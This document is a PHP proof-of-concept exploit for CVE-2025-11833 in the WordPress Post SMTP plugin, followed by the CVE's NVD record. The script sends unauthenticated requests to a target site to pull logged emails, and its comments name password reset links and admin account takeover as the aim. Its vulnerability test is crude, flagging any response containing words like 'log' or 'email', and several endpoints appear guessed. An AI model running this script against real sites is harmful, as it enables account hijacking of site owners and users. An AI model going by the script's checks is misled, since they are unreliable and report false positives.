CVE-2025-11833

<?php /** * CVE-2025-11833 PoC - Post SMTP Unauthorized Email Access * This PoC demonstrates the missing capability check vulnerability * in Post SMTP plugin's __construct function * * Usage: php cve-2025-11833-poc.php <target-url> */ class PostSMTPPoC { private $targetUrl; private $vulnerableVersions = ['3.6.0', '3.5.0', '3.4.0', '3.3.0', '3.2.0']; public function __construct($url) { $this->targetUrl = rtrim($url, '/'); } /** * Check if target is vulnerable by attempting to access email logs * The vulnerability exists because __construct function lacks capability check */ public function checkVulnerability() { echo "[*] Checking vulnerability for CVE-2025-11833\n"; echo "[*] Target: {$this->targetUrl}\n\n"; // Method 1: Direct API endpoint access (if exposed) $endpoints = [ '/wp-json/post-smtp/v1/logs', '/?rest_route=/post-smtp/v1/logs', '/wp-content/plugins/post-smtp/Postman/PostmanEmailLogs.php' ]; foreach ($endpoints as $endpoint) { $url = $this->targetUrl . $endpoint; $response = $this->sendRequest($url); if ($this->isVulnerable($response)) { echo "[+] VULNERABLE: {$endpoint}\n"; echo "[+] Access to email logs confirmed without authentication\n"; return true; } } // Method 2: Check plugin version via readme $readmeUrl = $this->targetUrl . '/wp-content/plugins/post-smtp/readme.txt'; $response = $this->sendRequest($readmeUrl); if ($this->checkVersion($response)) { echo "[!] Plugin version detected, manual verification needed\n"; } return false; } /** * Extract email logs - simulates unauthorized access */ public function extractEmailLogs() { echo "\n[*] Attempting to extract email logs...\n"; // In real attack, this would extract all logged emails // including password reset emails containing sensitive links $logEndpoints = [ '/wp-admin/admin-ajax.php?action=post_smtp_get_logs', '/wp-json/post-smtp/v1/emails' ]; foreach ($logEndpoints as $endpoint) { $url = $this->targetUrl . $endpoint; $response = $this->sendRequest($url); if ($this->containsEmailData($response)) { echo "[+] Email data accessible at: {$endpoint}\n"; echo "[+] Contains sensitive information (password reset links, etc.)\n"; } } } private function sendRequest($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); $response = curl_exec($ch); curl_close($ch); return $response; } private function isVulnerable($response) { // Check if response contains email log data return (strpos($response, 'email') !== false || strpos($response, 'log') !== false || strpos($response, 'smtp') !== false); } private function containsEmailData($response) { // Check for email-related content return (strpos($response, 'to:') !== false || strpos($response, 'subject:') !== false || strpos($response, 'message_id') !== false); } private function checkVersion($response) { foreach ($this->vulnerableVersions as $version) { if (strpos($response, 'Stable tag: ' . $version) !== false) { echo "[!] Vulnerable version detected: {$version}\n"; return true; } } return false; } } // Main execution if ($argc < 2) { echo "Usage: php cve-2025-11833-poc.php <target-url>\n"; echo "Example: php cve-2025-11833-poc.php http://target.com\n"; exit(1); } $poc = new PostSMTPPoC($argv[1]); $poc->checkVulnerability(); $poc->extractEmailLogs(); /* * Impact Assessment: * - Unauthenticated attackers can read all logged emails * - Password reset emails may contain valid reset tokens * - Attackers can hijack user accounts including admin accounts * - Full site compromise possible through admin account takeover */ ?>

{"cve": {"id": "CVE-2025-11833", "sourceIdentifier": "[email protected]", "published": "2025-11-01T04:15:42.660", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Post SMTP – Complete SMTP Solution with Logs, Alerts, Backup SMTP & Mobile App plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the __construct function in all versions up to, and including, 3.6.0. This makes it possible for unauthenticated attackers to read arbitrary logged emails sent through the Post SMTP plugin, including password reset emails containing password reset links, which can lead to account takeover."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/post-smtp/tags/3.5.0/Postman/PostmanEmailLogs.php#L51", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3386160/post-smtp", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/491f44fc-712c-4f67-b5c2-a7396941afc1?source=cve", "source": "[email protected]"}]}}